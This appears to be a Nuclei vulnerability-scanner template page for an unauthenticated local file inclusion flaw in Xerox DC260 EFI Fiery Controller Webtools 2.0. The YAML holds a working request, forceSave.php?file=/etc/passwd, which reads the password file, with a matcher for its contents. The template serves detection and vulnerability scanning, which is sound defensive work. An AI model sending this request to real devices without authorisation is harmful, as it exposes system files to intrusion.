Skip to content

Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion

ID: xerox-efi-lfi

Severity: high

Author: gy741

Tags: iot,xerox,disclosure,lfi,packetstorm,edb

Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the ‘file’ GET parameter in ‘forceSave.php’ script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.

id: xerox-efi-lfi
info:
name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
author: gy741
severity: high
description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
- https://packetstormsecurity.com/files/145570
- https://www.exploit-db.com/exploits/43398/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: iot,xerox,disclosure,lfi,packetstorm,edb
http:
- method: GET
path:
- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502202b342eb5fabacff9bba7b034367edccbc52c997addb1cff6ddf3345b35a1e4f2022100d01256668abe45a4532cffa98c6270b7147466dd7fcb9b4743f5495d5938b83d:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/xerox-efi-lfi.yaml"

View on Github